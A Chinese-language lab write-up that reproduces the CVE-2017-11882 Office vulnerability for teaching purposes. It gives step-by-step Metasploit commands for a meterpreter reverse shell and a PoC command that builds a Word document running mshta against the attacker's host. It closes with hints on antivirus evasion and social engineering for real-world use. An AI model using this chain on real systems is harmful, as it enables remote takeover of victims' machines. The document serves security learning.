CVE-2017-11882漏洞超详细复现
开篇闲聊:
CVE-2017-11882漏洞复现的文章我之前在公司社区里已经发过一遍了,但是最近又研究了一点并且和CVE-2018-0802结合了一下,觉得这个漏洞还是有必要再写写,顺便凑一下我好久没更新过的社团简书作业吧 : ),此外,本篇漏洞复现旨在给明年的学弟进行kail的教学,所以内容很琐碎,请各位表哥绕道......
漏洞概述:
CVE-2017-11882是一个潜伏17年之久的并于2017年被公开的可以通杀office2003到2016的所有版本的漏洞,攻击者只需给目标发送一个制作好的word文档并且这个文档被打开即可完成攻击。
复现环境:
kail linux
Windows7(亲测Win10也可以,不过需要使用免杀技术,不然会被报毒)
office2016(选择哪个都行,我之前尝试使用2003,激活这关就让我头大)
Poc代码(https://github.com/Ridter/CVE-2017-11882/)(网上挺多的,我给你们随便找了一个)
复现过程:
开启kail终端输入:
root@wuyou:~# ifconfig
查看你的IP然后再开个新终端输入:
root@wuyou:~# msfconsole
msf > search cve-2017-11882
选择哪个都可以,这里我使用了网上的另一个rb文件msf > use exploit/windows/smb/CVE-2017-11882(看清楚你自己的选项,别直接复制)
输入的时候别忘了自动补齐......msf exploit(windows/smb/CVE-2017-11882) > show options
查看需要填入的内容msf exploit(windows/smb/CVE-2017-11882) > set lhost 192.168.190.134
msf exploit(windows/smb/CVE-2017-11882) > set uripath 11882
msf exploit(windows/smb/CVE-2017-11882) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/CVE-2017-11882) > exploit
开始监听这时开始制作doc文档吧!
进入你放py脚本的文件夹内然后输入命令即可(记得改成你自己的IP)
root@wuyou:~/cve-2017-11882# python CVE-2017-11882.py -c "mshta http://192.168.190.134:8080" -o 11882.doc
然后把制作好的doc文档在靶机上打开
靶机上一切正常这时渗透机上出现:
Ctrl+C终止掉后选择Session1
msf exploit(windows/smb/CVE-2017-11882) >sessions 1
这时成功连接(如果不行就尝试在靶机右键doc文档点击编辑!打开查看和编辑文档是有区别的)
截个屏玩一下吧
meterpreter > screenshot
结语:
这个漏洞如果想要在实战中使用还要和CVE-2018-0802结合起来并使用一些免杀技术,再结合一点社工才能提高成功率,我写这个复现不是想要大家使用这些去进行攻击,而是我发现通过复现这个漏洞,可以学习到很多的细节方面的知识,而且整天挖洞觉得累了研究几个CVE也是挺有趣的。